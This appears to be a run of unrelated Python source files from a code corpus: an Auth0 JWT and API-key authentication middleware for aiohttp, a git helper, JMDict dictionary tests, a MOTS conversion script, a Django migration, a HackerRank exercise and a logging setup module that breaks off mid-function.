warnings.filterwarnings("ignore", message="int_from_bytes is deprecated")
from jose import jwt
from multidict import CIMultiDict
import sentry_sdk
from sqlalchemy import select
from athenian.api.async_utils import gather
from athenian.api.cache import cached
from athenian.api.controllers.account import get_user_account_status
from athenian.api.kms import AthenianKMS
from athenian.api.models.state.models import Account, God, UserToken
from athenian.api.models.web import ForbiddenError, GenericError
from athenian.api.models.web.user import User
from athenian.api.request import AthenianWebRequest
from athenian.api.response import ResponseError
from athenian.api.tracing import sentry_span
from athenian.api.typing_utils import wraps
class Auth0:
    """Class for Auth0 middleware compatible with aiohttp."""

    # Default configuration, read from the environment at import time.
    # Each value can be overridden by the corresponding __init__ argument.
    AUTH0_DOMAIN = os.getenv("AUTH0_DOMAIN")
    AUTH0_AUDIENCE = os.getenv("AUTH0_AUDIENCE")
    AUTH0_CLIENT_ID = os.getenv("AUTH0_CLIENT_ID")
    AUTH0_CLIENT_SECRET = os.getenv("AUTH0_CLIENT_SECRET")
    # User ID assigned to public, unauthorized requests.
    DEFAULT_USER = os.getenv("ATHENIAN_DEFAULT_USER")
    # Global secret used to encrypt sensitive personal information.
    KEY = os.getenv("ATHENIAN_INVITATION_KEY")
    # How long /userinfo responses are cached, in seconds.
    USERINFO_CACHE_TTL = 60  # seconds
    log = logging.getLogger("auth")
    def __init__(self,
                 domain=AUTH0_DOMAIN,
                 audience=AUTH0_AUDIENCE,
                 client_id=AUTH0_CLIENT_ID,
                 client_secret=AUTH0_CLIENT_SECRET, whitelist: Sequence[str] = tuple(),
                 default_user=DEFAULT_USER,
                 key=KEY,
                 cache: Optional[aiomcache.Client] = None,
                 lazy=False,
                 force_user: str = ""):
        """
        Create a new Auth0 middleware.

        See:
            - https://auth0.com/docs/tokens/guides/get-access-tokens#control-access-token-audience
            - https://auth0.com/docs/api-auth/tutorials/client-credentials

        :param domain: Auth0 domain.
        :param audience: JWT audience parameter.
        :param client_id: Application's Client ID.
        :param client_secret: Application's Client Secret.
        :param whitelist: Routes that do not need authorization.
        :param default_user: Default user ID - the one that's assigned to public, unauthorized \
                             requests.
        :param key: Global secret used to encrypt sensitive personal information.
        :param cache: memcached client to cache the user profiles.
        :param lazy: Value that indicates whether Auth0 Management API tokens and JWKS data \
                     must be asynchronously requested at first related method call.
        :param force_user: Ignore all the incoming bearer tokens and make all requests on behalf \
                           of this user ID.
        """
        # Fail fast if any mandatory setting is missing: each of these falls back
        # to an environment variable, hence the error mentions the variable name.
        for var, env_name in ((domain, "AUTH0_DOMAIN"),
                              (audience, "AUTH0_AUDIENCE"),
                              (client_id, "AUTH0_CLIENT_ID"),
                              (client_secret, "AUTH0_CLIENT_SECRET"),
                              (default_user, "ATHENIAN_DEFAULT_USER"),
                              (key, "ATHENIAN_INVITATION_KEY")):
            if not var:
                raise EnvironmentError("%s environment variable must be set." % env_name)
        self._domain = domain
        self._audience = audience
        self._whitelist = whitelist
        self._cache = cache
        self._client_id = client_id
        self._client_secret = client_secret
        self._default_user_id = default_user
        # Lazily resolved User object for the default (anonymous) user.
        self._default_user = None  # type: Optional[User]
        self._key = key
        self.force_user = force_user
        if force_user:
            self.log.warning("Forced user authorization mode: %s", force_user)
        # Shared HTTP session for all Auth0 API calls; closed in close().
        self._session = aiohttp.ClientSession()
        # _kids_event is set once the first JWKS fetch completes; kids() waits on it.
        self._kids_event = asyncio.Event()
        if not lazy:
            self._jwks_loop = asyncio.ensure_future(self._fetch_jwks_loop())
        else:
            # Deferred until the first kids() call.
            self._jwks_loop = None  # type: Optional[asyncio.Future]
        self._kids: Dict[str, Any] = {}
        # _mgmt_event is set once a management token is acquired; mgmt_token() waits on it.
        self._mgmt_event = asyncio.Event()
        self._mgmt_token = None  # type: Optional[str]
        if not lazy:
            self._mgmt_loop = asyncio.ensure_future(self._acquire_management_token_loop())
        else:
            # Deferred until the first mgmt_token() call.
            self._mgmt_loop = None  # type: Optional[asyncio.Future]
async def kids(self) -> Dict[str, Any]:
"""Return the mapping kid -> Auth0 jwks record with that kid; wait until fetched."""
if self._jwks_loop is None:
self._jwks_loop = asyncio.ensure_future(self._fetch_jwks_loop())
await self._kids_event.wait()
return self._kids
async def mgmt_token(self) -> str:
"""Return the Auth0 management API token; wait until fetched."""
if self._mgmt_loop is None:
self._mgmt_loop = asyncio.ensure_future(self._acquire_management_token_loop())
await self._mgmt_event.wait()
if not self._mgmt_token:
raise LookupError("Could not acquire the Auth0 Management token.")
return self._mgmt_token
async def default_user(self) -> User:
"""Return the user of unauthorized, public requests."""
if self._default_user is not None:
return self._default_user
self._default_user = await self.get_user(self._default_user_id)
if self._default_user is None:
message = "Failed to fetch the default user (%s) details. " \
"Try changing ATHENIAN_DEFAULT_USER" % self._default_user_id
self.log.error(message)
raise GracefulExit(message)
return self._default_user
@property
def domain(self) -> str:
"""Return the assigned Auth0 domain, e.g. "athenian.auth0.com"."""
return self._domain
@property
def audience(self) -> str:
"""Return the assigned Auth0 audience URL, e.g. "https://api.athenian.co"."""
return self._audience
@property
def key(self) -> str:
"""Return the global secret used to encrypt sensitive personal information."""
return self._key
    async def close(self):
        """Free resources and close connections associated with the object.

        Besides cancelling the background tasks and closing the HTTP session,
        this waits until every SSL transport reports connection_lost, working
        around an aiohttp shutdown issue (see the FIXME link below).
        """
        if self._jwks_loop is not None:
            self._jwks_loop.cancel()
        if self._mgmt_loop is not None:  # this may happen if lazy_mgmt=True
            self._mgmt_loop.cancel()
        session = self._session
        # FIXME(vmarkovtsev): remove this bloody mess when this issue is resolved:
        # https://github.com/aio-libs/aiohttp/issues/1925#issuecomment-575754386
        # Count the live SSL transports and patch their protocols so that we can
        # wait for all of them to finish closing.
        transports = 0
        all_is_lost = asyncio.Event()
        if session.connector is not None:
            # NOTE(review): _conns is a private aiohttp attribute; this may break
            # across aiohttp versions.
            for conn in session.connector._conns.values():
                for handler, _ in conn:
                    proto = getattr(handler.transport, "_ssl_protocol", None)
                    if proto is None:
                        continue
                    transports += 1

                    # Wrap the original callback: decrement the live transport
                    # counter and signal once the last one is gone.
                    def connection_lost(orig_lost, exc):
                        orig_lost(exc)
                        nonlocal transports
                        transports -= 1
                        if transports == 0:
                            all_is_lost.set()

                    def eof_received(orig_eof_received):
                        try:
                            orig_eof_received()
                        except AttributeError:
                            # It may happen that eof_received() is called after
                            # _app_protocol and _transport are set to None.
                            # Jeez, asyncio sucks sometimes.
                            pass
                    proto.connection_lost = functools.partial(
                        connection_lost, proto.connection_lost)
                    proto.eof_received = functools.partial(eof_received, proto.eof_received)
        await session.close()
        if transports > 0:
            # Wait until every patched transport has reported connection_lost.
            await all_is_lost.wait()
async def get_user(self, user: str) -> Optional[User]:
"""Retrieve a user using Auth0 mgmt API by ID."""
users = await self.get_users([user])
if len(users) == 0:
return None
return next(iter(users.values()))
    @sentry_span
    async def get_users(self, users: Sequence[str]) -> Dict[str, User]:
        """
        Retrieve several users using Auth0 mgmt API by ID.

        The query is sent as one batch; if the server rejects it as too long
        (or with 400), the batch is recursively bisected. Rate limits and
        transient network errors are retried; 401 forces a token refresh.

        :return: Mapping from user ID to the found user details. Some users may be not found, \
                 some users may be duplicates.
        """
        token = await self.mgmt_token()
        assert len(users) >= 0  # we need __len__

        async def get_batch(batch: List[str]) -> List[User]:
            # `token` is shared across recursive calls so that a refresh
            # triggered by one branch benefits the others.
            nonlocal token
            query = "user_id:(%s)" % " ".join('"%s"' % u for u in batch)
            # Up to 30 attempts for this batch before giving up.
            for retries in range(1, 31):
                try:
                    resp = await self._session.get(
                        "https://%s/api/v2/users?q=%s" % (self._domain, query),
                        headers={"Authorization": "Bearer " + token})
                except aiohttp.ClientOSError as e:
                    # Retry only transient network-level errors.
                    if e.errno in (-3, 101, 103, 104):
                        self.log.warning("Auth0 Management API: %s", e)
                        # -3: Temporary failure in name resolution
                        # 101: Network is unreachable
                        await asyncio.sleep(0.1)
                        continue
                    raise e from None
                except RuntimeError:
                    # our loop is closed and we are doomed
                    return []
                if resp.status == HTTPStatus.TOO_MANY_REQUESTS:
                    # Rate limited: back off for a randomized interval and retry.
                    self.log.warning("Auth0 Management API rate limit hit while listing "
                                     "%d/%d users, retry %d",
                                     len(batch), len(users), retries)
                    await asyncio.sleep(0.5 + random())
                elif resp.status in (HTTPStatus.REQUEST_URI_TOO_LONG, HTTPStatus.BAD_REQUEST):
                    # The query was too big: split the batch in two and recurse.
                    if len(batch) == 1:
                        return []
                    m = len(batch) // 2
                    self.log.warning("Auth0 Management API /users raised HTTP %d, bisecting "
                                     "%d/%d -> %d, %d",
                                     resp.status, len(batch), len(users), m, len(batch) - m)
                    b1, b2 = await gather(get_batch(batch[:m]), get_batch(batch[m:]))
                    return b1 + b2
                elif resp.status == HTTPStatus.UNAUTHORIZED:
                    # force refresh the token
                    self._mgmt_loop.cancel()
                    self._mgmt_loop = None
                    self._mgmt_token = None
                    token = await self.mgmt_token()
                else:
                    # Either success or an unrecoverable error: stop retrying.
                    if resp.status >= 400:
                        try:
                            response_body = await resp.json()
                        except aiohttp.ContentTypeError:
                            response_body = await resp.text()
                        self.log.error("Auth0 Management API /users raised HTTP %d: %s",
                                       resp.status, response_body)
                    break
            else:  # for retries in range
                # All attempts exhausted without reaching the break above.
                return []
            if resp.status != HTTPStatus.OK:
                return []
            found = await resp.json()
            return [User.from_auth0(**u, encryption_key=self.key) for u in found]

        return {u.id: u for u in await get_batch(list(users))}
async def _fetch_jwks_loop(self) -> None:
while True:
await self._fetch_jwks()
await asyncio.sleep(3600) # 1 hour
async def _acquire_management_token_loop(self) -> None:
while True:
expires_in = await self._acquire_management_token(1)
await asyncio.sleep(expires_in)
async def _fetch_jwks(self) -> None:
req = await self._session.get("https://%s/.well-known/jwks.json" % self._domain)
jwks = await req.json()
self.log.info("Fetched %d JWKS records", len(jwks))
self._kids = {key["kid"]: {k: key[k] for k in ("kty", "kid", "use", "n", "e")}
for key in jwks["keys"]}
self._kids_event.set()
    async def _acquire_management_token(self, attempt: int) -> float:
        """Request a fresh Auth0 management API token via client credentials.

        Retries recursively (1 second apart, up to 10 attempts) on any failure
        and shuts the server down with GracefulExit when all attempts fail.

        :param attempt: 1-based number of the current attempt.
        :return: Number of seconds until the token should be renewed \
                 (expiry minus a 5-minute safety margin, never negative).
        """
        max_attempts = 10
        error = None
        try:
            resp = await self._session.post("https://%s/oauth/token" % self._domain, headers={
                "content-type": "application/x-www-form-urlencoded",
            }, data={
                "grant_type": "client_credentials",
                "client_id": self._client_id,
                "client_secret": self._client_secret,
                "audience": "https://%s/api/v2/" % self._domain,
            }, timeout=5)
            data = await resp.json()
            self._mgmt_token = data["access_token"]
            # Unblock waiters in mgmt_token().
            self._mgmt_event.set()
            expires_in = int(data["expires_in"])
        except Exception as e:
            error = e
            # `resp` may be unbound if the POST itself failed; the nested
            # try/except below covers that case too.
            try:
                resp_text = await resp.text()
            except Exception:
                resp_text = "N/A"
            # do not use %s - Sentry does not display it properly
            if attempt >= max_attempts:
                self.log.exception("Failed to renew the Auth0 management token: " + resp_text)
                raise GracefulExit() from e
        if error is not None:
            # Not fatal yet: wait a second and recurse into the next attempt.
            self.log.warning("Failed to renew the Auth0 management token %d / %d: %s: %s",
                             attempt, max_attempts, error, resp_text)
            await asyncio.sleep(1)
            return await self._acquire_management_token(attempt + 1)
        self.log.info("Acquired new Auth0 management token %s...%s for the next %s",
                      self._mgmt_token[:12], self._mgmt_token[-12:], timedelta(seconds=expires_in))
        expires_in -= 5 * 60  # 5 minutes earlier
        if expires_in < 0:
            expires_in = 0
        return expires_in
def _is_whitelisted(self, request: aiohttp.web.Request) -> bool:
for pattern in self._whitelist:
if re.match(pattern, request.path):
return True
return False
async def _get_user_info(self, token: str) -> User:
if token == "null":
return await self.default_user()
return await self._get_user_info_cached(token)
    # Responses are cached per token for USERINFO_CACHE_TTL seconds to avoid
    # hitting the /userinfo endpoint on every request.
    @cached(
        exptime=lambda self, **_: self.USERINFO_CACHE_TTL,
        serialize=pickle.dumps,
        deserialize=pickle.loads,
        key=lambda token, **_: (token,),
        cache=lambda self, **_: self._cache,
    )
    async def _get_user_info_cached(self, token: str) -> User:
        """Fetch the user profile from Auth0 /userinfo for the given bearer token.

        :raises ResponseError: if the response is not JSON or the status is not 200.
        """
        resp = await self._session.get("https://%s/userinfo" % self._domain,
                                       headers={"Authorization": "Bearer " + token})
        try:
            user = await resp.json()
        except aiohttp.ContentTypeError:
            # Non-JSON body: surface the raw text in the error detail.
            raise ResponseError(GenericError(
                "/errors/Auth0", title=resp.reason, status=resp.status,
                detail=await resp.text()))
        if resp.status != 200:
            raise ResponseError(GenericError(
                "/errors/Auth0", title=resp.reason, status=resp.status,
                detail=user.get("description", str(user))))
        return User.from_auth0(**user, encryption_key=self.key)
    async def _set_user(self, request: AthenianWebRequest, token: str, method: str) -> None:
        """Resolve the authenticated identity and attach it to *request*.

        Sets ``request.uid``, ``request.account``, ``request.is_default_user``
        and a lazy ``request.user`` coroutine; applies "god mode" substitution
        when the authenticated user appears in the God table.

        :param token: Raw credential — a JWT for "bearer", an encrypted key for "apikey".
        :param method: Either "bearer" or "apikey"; anything else is a programming error.
        """
        if method == "bearer":
            token_info = await self._extract_bearer_token(token)
            # JWT "sub" claim is the user id; the account is resolved later.
            request.uid, request.account = token_info["sub"], None
        elif method == "apikey":
            request.uid, request.account = await self._extract_api_key(token, request)
        else:
            raise AssertionError("Unsupported auth method: %s" % method)
        # God users may impersonate another user, either via the X-Identity
        # header or via the mapped id stored in the God table.
        god = await request.sdb.fetch_one(
            select([God.mapped_id]).where(God.user_id == request.uid))
        if god is not None:
            request.god_id = request.uid
            if "X-Identity" in request.headers:
                mapped_id = request.headers["X-Identity"]
            else:
                mapped_id = god[God.mapped_id.name]
            if mapped_id is not None:
                request.uid = mapped_id
                self.log.info("God mode: %s became %s", request.god_id, mapped_id)
        request.is_default_user = request.uid == self._default_user_id
        sentry_sdk.set_user({"id": request.uid})

        async def get_user_info():
            # For impersonating gods and non-bearer auth we must look the user up
            # by uid; plain bearer sessions can reuse the /userinfo of the token.
            if method != "bearer" or (god is not None and request.god_id is not None):
                user_info = await self.get_user(key := request.uid)
            else:
                user_info = await self._get_user_info(key := token)
            if user_info is None:
                raise ResponseError(GenericError(
                    "/errors/Auth0", title="Failed to retrieve user details from Auth0",
                    status=HTTPStatus.SERVICE_UNAVAILABLE,
                    detail=key,
                ))
            sentry_sdk.set_user({"username": user_info.login, "email": user_info.email})
            return user_info

        # Deliberately lazy: the profile is only fetched if an endpoint awaits it.
        request.user = get_user_info
async def _extract_bearer_token(self, token: str) -> Dict[str, Any]:
if token == "null":
return {"sub": self.force_user or self._default_user_id}
# People who understand what's going on here:
# - @dennwc
# - @vmarkovtsev
try:
unverified_header = jwt.get_unverified_header(token)
except jwt.JWTError as e:
raise OAuthProblem(
description="Invalid header: %s. Use an RS256 signed JWT Access Token." % e)
if unverified_header["alg"] != "RS256":
raise OAuthProblem(
description="Invalid algorithm %s. Use an RS256 signed JWT Access Token." %
unverified_header["alg"])
kids = await self.kids()
try:
rsa_key = kids[unverified_header["kid"]]
except KeyError:
raise OAuthProblem(description="Unable to find the matching Auth0 RSA public key")
try:
return jwt.decode(
token,
rsa_key,
algorithms=["RS256"],
audience=self._audience,
issuer="https://%s/" % self._domain,
)
except jwt.ExpiredSignatureError as e:
raise OAuthProblem(description="JWT expired: %s" % e)
except jwt.JWTClaimsError as e:
raise OAuthProblem(description="invalid claims: %s" % e)
except jwt.JWTError as e:
raise OAuthProblem(description="Unable to parse the authentication token: %s" % e)
async def _extract_api_key(self, token: str, request: AthenianWebRequest) -> Tuple[str, int]:
kms = request.app["kms"] # type: AthenianKMS
if kms is None:
raise AuthenticationProblem(
status=HTTPStatus.UNAUTHORIZED,
title="Unable to authenticate with an API key.",
detail="The backend was not properly configured and there is no connection with "
"Google Key Management Service to decrypt API keys.")
try:
plaintext = await kms.decrypt(token)
except aiohttp.ClientResponseError:
raise Unauthorized()
try:
token_id = struct.unpack("<q", plaintext)[0]
except (ValueError, struct.error):
raise Unauthorized() from None
token_obj = await request.sdb.fetch_one(
select([UserToken]).where(UserToken.id == token_id))
if token_obj is None:
raise Unauthorized()
uid = token_obj[UserToken.user_id.name]
account = token_obj[UserToken.account_id.name]
return uid, account
class AthenianAioHttpSecurityHandlerFactory(connexion.security.AioHttpSecurityHandlerFactory):
    """Override verify_security() to re-route the security affairs to our Auth0 class."""

    def __init__(self, auth: Auth0, pass_context_arg_name):
        """`auth` is supplied by AthenianAioHttpApi."""
        super().__init__(pass_context_arg_name=pass_context_arg_name)
        self.auth = auth

    def verify_security(self, auth_funcs, required_scopes, function,
                        ) -> Callable[[ConnexionRequest], Coroutine[None, None, Any]]:
        """
        Decorate the request pipeline to check the security, either JWT or APIKey.

        If we don't see any authorization details, we assume the "default" user.
        """
        auth = self.auth  # type: Auth0

        async def get_token_info(request: ConnexionRequest):
            # Try each connexion security function until one returns a value;
            # results may be (nested) coroutines, hence the while-await loop.
            token_info = self.no_value
            for func in auth_funcs:
                token_info = func(request, required_scopes)
                while asyncio.iscoroutine(token_info):
                    token_info = await token_info
                if token_info is not self.no_value:
                    break
            return token_info

        @functools.wraps(function)
        async def wrapper(request: ConnexionRequest):
            token_info = self.no_value if auth.force_user else await get_token_info(request)
            if token_info is self.no_value:
                # "null" is the "magic" JWT that loads the default or forced user
                request.headers = CIMultiDict(request.headers)
                request.headers["Authorization"] = "Bearer null"
                token_info = await get_token_info(request)
            if token_info is self.no_value:
                raise Unauthorized("The endpoint you are calling requires X-API-Key header.")
            # token_info = {"token": <token>, "method": "bearer" or "apikey"}
            await auth._set_user(context := request.context, **token_info)
            # check whether the user may access the specified account
            if isinstance(request.json, dict):
                if (account := request.json.get("account")) is not None:
                    assert isinstance(account, int)
                    with sentry_sdk.configure_scope() as scope:
                        scope.set_tag("account", account)
                    await get_user_account_status(
                        context.uid, account, context.sdb, context.cache)
                elif (account := getattr(context, "account", None)) is not None:
                    # The body omitted "account" — inject the one bound to the
                    # credentials if the endpoint's OpenAPI schema requires it.
                    canonical = context.match_info.route.resource.canonical
                    route_specs = context.app["route_spec"]
                    if (spec := route_specs.get(canonical, None)) is not None:
                        try:
                            required = "account" in deep_get(spec, [
                                "requestBody", "content", "application/json", "schema",
                                "required",
                            ])
                        except KeyError:
                            required = False
                        if required:
                            request.json["account"] = account
                            context.account = account
            # check whether the account is enabled
            if context.account is not None:
                expires_at = await context.sdb.fetch_val(
                    select([Account.expires_at]).where(Account.id == context.account))
                # God users bypass the expiration check.
                if not getattr(context, "god_id", False) and (
                        expires_at is None or expires_at < datetime.now(expires_at.tzinfo)):
                    auth.log.warning("Attempt to use an expired account %d by user %s",
                                     context.account, context.uid)
                    raise Unauthorized("Your account has expired.")
            # finish the auth processing and chain forward
            return await function(request)
        return wrapper
def disable_default_user(func):
    """Decorate an endpoint handler to raise 403 if the user is the default one."""
    async def wrapped_disable_default_user(request: AthenianWebRequest,
                                           *args, **kwargs) -> aiohttp.web.Response:
        # Reject anonymous/default sessions before invoking the real handler.
        if request.is_default_user:
            raise ResponseError(ForbiddenError("%s is the default user" % request.uid))
        return await func(request, *args, **kwargs)
    # NOTE(review): this call only makes sense if `wraps` is a project helper with a
    # (wrapper, wrappee) signature; stdlib functools.wraps would have to be applied
    # as wraps(func)(wrapped_disable_default_user) — confirm which one is imported.
    wraps(wrapped_disable_default_user, func)
    return wrapped_disable_default_user
| 45.288288 | 99 | 0.580227 | 23,195 | 0.922817 | 0 | 0 | 7,548 | 0.300298 | 18,075 | 0.719117 | 5,735 | 0.228168 |
d38adc66f7d2d09f63a105229844d890c12fe69b | 732 | py | Python | expon/utils/git.py | hi-zhenyu/expon | 17ad421cd4c4085d3cad090b7c3383e4957075c4 | [
"MIT"
] | null | null | null | expon/utils/git.py | hi-zhenyu/expon | 17ad421cd4c4085d3cad090b7c3383e4957075c4 | [
"MIT"
] | null | null | null | expon/utils/git.py | hi-zhenyu/expon | 17ad421cd4c4085d3cad090b7c3383e4957075c4 | [
"MIT"
] | null | null | null |
import subprocess
def check_working_tree():
    """Verify that the git working tree contains no uncommitted changes.

    Returns:
        True when ``git diff --exit-code`` reports a clean tree.

    Raises:
        Exception: if there are uncommitted changes (git exits non-zero).
    """
    try:
        subprocess.check_output(['git', 'diff', '--exit-code'])
    except subprocess.CalledProcessError as e:
        # `git diff --exit-code` returns 1 when the tree is dirty; chain the
        # original error instead of printing debug noise and dropping it.
        raise Exception('Your working tree is not empty, please commit all changes.') from e
    return True
def get_git_revision_short_hash():
    """Return the abbreviated hash of the current git HEAD commit.

    Raises:
        Exception: if git cannot resolve HEAD (e.g. not inside a repository).
    """
    try:
        commit_id = subprocess.check_output(
            ['git', 'rev-parse', '--short', 'HEAD']).decode('ascii').strip()
    except subprocess.CalledProcessError as e:
        # Fixed typo in the original message ("Somthing") and chain the cause.
        raise Exception('Something is wrong with your git workspace!') from e
    return commit_id
d38adfd3b61c63659bb5353ed611e4308365e199 | 1,526 | py | Python | tests/dictionary/test_jmdict.py | DennisMerkus/omniglot | 687a681f4fa6721ea4655339d5c9f215161725b2 | [
"MIT"
] | null | null | null | tests/dictionary/test_jmdict.py | DennisMerkus/omniglot | 687a681f4fa6721ea4655339d5c9f215161725b2 | [
"MIT"
] | null | null | null | tests/dictionary/test_jmdict.py | DennisMerkus/omniglot | 687a681f4fa6721ea4655339d5c9f215161725b2 | [
"MIT"
] | null | null | null | import unittest
import pytest
from omniglot.jpn.jmdict.convert import create_JMDict_database_entries
from omniglot.jpn.jmdict.extract import convert_to_JSON
from omnilingual import PartOfSpeech
from .test_jmdict_entries import entry_America, entry_batsuichi
class TestJMDict(unittest.TestCase):
    """Conversion tests for JMDict entries into database lexemes."""
    # NOTE(review): these tests combine @pytest.mark.asyncio with a
    # unittest.TestCase subclass; confirm the installed pytest-asyncio
    # actually awaits coroutine methods on TestCase classes.

    @pytest.mark.asyncio
    async def test_converts_America_entry_correctly(self):
        # A single JMDict entry must collapse into exactly one lexeme.
        lexemes = await create_JMDict_database_entries(
            await convert_to_JSON(entry_America)
        )
        self.assertEqual(len(lexemes), 1)
        lexeme = lexemes[0]
        # All spellings (kanji + kana) are collected in orthography.all.
        self.assertSetEqual(set(lexeme.orthography.all), set(["亜米利加", "亜墨利加", "アメリカ"]))
        self.assertIn("アメリカ", lexeme.orthography.kana)
        self.assertEqual(lexeme.pos, PartOfSpeech.Noun)
        self.assertIn("?UsuallyKana", lexeme.tags)

    @pytest.mark.asyncio
    async def test_converts_restricted_kana_correctly(self):
        # Entry with kana readings restricted to specific kanji forms.
        lexemes = await create_JMDict_database_entries(
            await convert_to_JSON(entry_batsuichi)
        )
        self.assertEqual(len(lexemes), 1)
        lexeme = lexemes[0]
        self.assertSetEqual(
            set(lexeme.orthography.all),
            set(["罰一", "ばつ一", "バツ1", "ばついち", "バツいち", "バツイチ"]),
        )
        # Kana and kanji forms must be partitioned correctly.
        self.assertSetEqual(set(lexeme.orthography.kana), set(["ばついち", "バツいち", "バツイチ"]))
        self.assertSetEqual(set(lexeme.orthography.kanji), set(["罰一", "ばつ一", "バツ1"]))
        self.assertEqual(lexeme.pos, PartOfSpeech.Noun)
if __name__ == "__main__":
unittest.main()
| 28.792453 | 88 | 0.679554 | 1,325 | 0.808913 | 0 | 0 | 1,278 | 0.78022 | 1,228 | 0.749695 | 224 | 0.136752 |
d38c29f52b40e951d49b1e350345234b2a6592db | 572 | py | Python | algorithms/TrackR-CNN/mots_tools/mots_common/images_to_txt.py | Diego-Barbulo/TrackR-CNN | 12eeaca0bd1903ee28822bd2341456404b6e0af4 | [
"MIT"
] | 1 | 2022-03-25T08:57:52.000Z | 2022-03-25T08:57:52.000Z | algorithms/TrackR-CNN/mots_tools/mots_common/images_to_txt.py | Diego-Barbulo/TrackR-CNN | 12eeaca0bd1903ee28822bd2341456404b6e0af4 | [
"MIT"
] | null | null | null | algorithms/TrackR-CNN/mots_tools/mots_common/images_to_txt.py | Diego-Barbulo/TrackR-CNN | 12eeaca0bd1903ee28822bd2341456404b6e0af4 | [
"MIT"
] | 1 | 2022-03-25T08:58:19.000Z | 2022-03-25T08:58:19.000Z | import sys
from mots_common.io import load_sequences, load_seqmap, write_sequences
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python images_to_txt.py gt_img_folder gt_txt_output_folder seqmap")
sys.exit(1)
gt_img_folder = sys.argv[1]
gt_txt_output_folder = sys.argv[2]
seqmap_filename = sys.argv[3]
seqmap, _ = load_seqmap(seqmap_filename)
print("Loading ground truth images...")
gt = load_sequences(gt_img_folder, seqmap)
print("Writing ground truth txts...")
write_sequences(gt, gt_txt_output_folder)
| 30.105263 | 86 | 0.723776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 146 | 0.255245 |
d38e40999aab7b5c93fbc4223d42505d8ef713d4 | 707 | py | Python | assets/migrations/0014_auto_20161105_1739.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | null | null | null | assets/migrations/0014_auto_20161105_1739.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | 11 | 2020-03-24T15:29:46.000Z | 2022-03-11T23:14:48.000Z | assets/migrations/0014_auto_20161105_1739.py | stewardshiptools/stewardshiptools | ee5d27e7b0d5d4947f34ad02bdf63a06ad0a5c3e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: alter the `asset` OneToOneField on both
    # meta-document models to allow NULL and expose the reverse accessor as
    # `meta_document`.
    dependencies = [
        ('assets', '0013_metadocumentasset_metadocumentsecureasset'),
    ]
    operations = [
        migrations.AlterField(
            model_name='metadocumentasset',
            name='asset',
            field=models.OneToOneField(to='assets.Asset', null=True, related_name='meta_document'),
        ),
        migrations.AlterField(
            model_name='metadocumentsecureasset',
            name='asset',
            field=models.OneToOneField(to='assets.SecureAsset', null=True, related_name='meta_document'),
        ),
    ]
| 28.28 | 105 | 0.637907 | 598 | 0.845827 | 0 | 0 | 0 | 0 | 0 | 0 | 201 | 0.2843 |
d38e59555b55370c405b1d51851796ba7dbc18c5 | 695 | py | Python | pythontuts/nestedlists.py | antfarmar/hackerrank | 87aa6ec8abd35746f209efdaa29b1799fd03baaa | [
"Unlicense"
] | 1 | 2021-09-09T02:02:53.000Z | 2021-09-09T02:02:53.000Z | pythontuts/nestedlists.py | antfarmar/hackerrank | 87aa6ec8abd35746f209efdaa29b1799fd03baaa | [
"Unlicense"
] | null | null | null | pythontuts/nestedlists.py | antfarmar/hackerrank | 87aa6ec8abd35746f209efdaa29b1799fd03baaa | [
"Unlicense"
] | null | null | null | #import sys
# HackerRank "Nested Lists": print the names of students with the
# second-lowest grade, sorted alphabetically.
# Input file format: first token is the record count, then alternating
# name/score tokens. (Originally read from sys.stdin.)
with open(r".\data\nestedlists.txt") as file:  # close the handle deterministically
    data = file.read().strip().split()[1:]
records = [[data[i], float(data[i + 1])] for i in range(0, len(data), 2)]
print(records)
# Lowest score, then the smallest positive gap above it — i.e. the offset of
# the second-lowest distinct score.
low = min([r[1] for r in records])
dif = min([r[1] - low for r in records if r[1] != low])
print(dif)
# Names scoring exactly the second-lowest value, in alphabetical order.
names = [r[0] for r in records if r[1] - dif == low]
for name in sorted(names):
    print(name)
| 25.740741 | 73 | 0.623022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 340 | 0.489209 |
d38f0abfb6dad1b66224355d43de5f31e2448b16 | 1,856 | py | Python | src/koala/logging.py | hugovk/koala | a493b8159d559c39ef39d755d4e50a7bcc9bd4e5 | [
"BSD-3-Clause"
] | 4 | 2020-02-14T03:51:47.000Z | 2022-02-01T03:53:50.000Z | src/koala/logging.py | hugovk/koala | a493b8159d559c39ef39d755d4e50a7bcc9bd4e5 | [
"BSD-3-Clause"
] | 278 | 2020-02-13T00:34:20.000Z | 2022-03-31T11:56:09.000Z | src/koala/logging.py | hugovk/koala | a493b8159d559c39ef39d755d4e50a7bcc9bd4e5 | [
"BSD-3-Clause"
] | 12 | 2020-02-12T23:56:04.000Z | 2022-01-20T01:39:35.000Z | # -*- coding: utf-8 -*-
"""
Logging configuration functions
"""
from logbook import NullHandler, FileHandler, NestedSetup
from logbook.more import ColorizedStderrHandler
from logbook.queues import ThreadedWrapperHandler
def logging_options(parser):
    """Add cli options for logging to parser"""
    levels = ("critical", "error", "warning", "notice", "info", "debug")
    # File sink: path plus its own verbosity threshold.
    parser.add_argument("--log-file")
    parser.add_argument("--log-file-level", choices=levels, default="debug")
    # Stderr verbosity: an explicit level, or the quiet/verbose shortcuts —
    # the three are mutually exclusive.
    exclusive = parser.add_mutually_exclusive_group()
    exclusive.add_argument("--stderr-level", choices=levels, default="notice")
    exclusive.add_argument("--quiet", "-q", default=False, action="store_true")
    exclusive.add_argument("--verbose", "-v", default=False, action="store_true")
def log_handler(args, thread_wrapping=True):
    """
    Return log handler with given config
    """
    # Accept either a plain dict or an argparse-style namespace.
    options = args if isinstance(args, dict) else vars(args)
    if options.get("quiet"):
        stderr_sink = ColorizedStderrHandler(level="ERROR")
    elif options.get("verbose"):
        stderr_sink = ColorizedStderrHandler(level="DEBUG")
    else:
        stderr_sink = ColorizedStderrHandler(
            level=options.get("stderr_level", "NOTICE").upper(), bubble=True
        )
    log_file = options.get("log_file")
    if log_file:
        file_sink = FileHandler(
            log_file,
            level=options.get("log_file_level", "DEBUG").upper(), bubble=True
        )
    else:
        file_sink = NullHandler()
    if thread_wrapping:
        # Route records through background threads so logging never blocks.
        file_sink = ThreadedWrapperHandler(file_sink)
